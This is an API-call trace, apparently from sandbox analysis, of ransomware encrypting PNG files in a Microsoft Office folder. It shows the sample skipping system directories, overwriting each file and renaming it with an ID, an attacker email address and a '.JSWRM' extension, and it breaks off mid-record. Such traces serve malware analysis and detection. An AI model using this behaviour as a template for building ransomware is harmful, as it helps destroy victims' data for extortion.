(lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0134.127] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.127] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned 1 [0134.127] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0134.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-100.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 45 [0134.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.128] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1892) returned 1 [0134.128] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.128] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x760, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x760, lpOverlapped=0x0) returned 1 [0134.129] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.129] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x760, lpOverlapped=0x0) returned 1 [0134.129] CloseHandle (hObject=0x238) returned 1 [0134.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.130] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x837, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-white_scale-140.png", cAlternateFileName="WI0FC0~1.PNG")) returned 1 [0134.130] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2=".") returned 1 [0134.130] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="..") returned 1 [0134.130] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="...") returned 1 [0134.130] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="windows") returned 1 [0134.131] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="recovery") returned 1 [0134.131] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="perflogs") returned 1 [0134.131] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="documents and settings") returned 1 [0134.131] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.131] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="system volume information") returned 1 [0134.131] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-140.png", lpString2="msocache") returned 1 [0134.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-140.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-140.png", lpUsedDefaultChar=0x0) returned 45 [0134.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.132] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2103) returned 1 [0134.132] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.132] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x830, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x830, lpOverlapped=0x0) returned 1 [0134.134] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.134] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x830, lpOverlapped=0x0) returned 1 [0134.134] CloseHandle (hObject=0x238) returned 1 [0134.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.135] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xab9, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-white_scale-180.png", cAlternateFileName="WICCF1~1.PNG")) returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2=".") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="..") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="...") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="windows") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="recovery") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="perflogs") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="documents and settings") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="system volume information") returned 1 [0134.135] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-180.png", lpString2="msocache") returned 1 [0134.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0134.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-180.png", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-180.png", lpUsedDefaultChar=0x0) returned 45 [0134.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.137] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2745) returned 1 [0134.137] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.137] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xab0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xab0, lpOverlapped=0x0) returned 1 [0134.139] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.139] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xab0, lpOverlapped=0x0) returned 1 [0134.139] CloseHandle (hObject=0x238) returned 1 [0134.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.140] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x60a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.contrast-white_scale-80.png", cAlternateFileName="WICBAE~1.PNG")) returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2=".") returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="..") returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="...") returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="windows") returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="recovery") returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="perflogs") returned 1 [0134.142] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0134.143] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.143] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="system volume information") returned 1 [0134.143] lstrcmpiW (lpString1="WinProjLogoSmall.contrast-white_scale-80.png", lpString2="msocache") returned 1 [0134.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22d260, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0134.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.contrast-white_scale-80.png", cchWideChar=44, lpMultiByteStr=0x22cdc8, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 44 [0134.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.143] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.144] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1546) returned 1 [0134.144] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.144] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0134.148] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.148] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0134.148] CloseHandle (hObject=0x238) returned 1 [0134.148] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.149] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.scale-100.png", cAlternateFileName="WIC069~1.PNG")) returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2=".") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="..") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="...") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="windows") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="recovery") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="perflogs") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="documents and settings") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="system volume information") returned 1 [0134.149] lstrcmpiW (lpString1="WinProjLogoSmall.scale-100.png", lpString2="msocache") returned 1 [0134.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x240f20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0134.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-100.png", cchWideChar=30, lpMultiByteStr=0x240fe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-100.png", lpUsedDefaultChar=0x0) returned 30 [0134.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.150] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2036) returned 1 [0134.150] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.150] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7f0, lpOverlapped=0x0) returned 1 [0134.152] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.152] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7f0, lpOverlapped=0x0) returned 1 [0134.152] CloseHandle (hObject=0x238) returned 1 [0134.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.156] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x869, dwReserved0=0xf1348, dwReserved1=0x0, 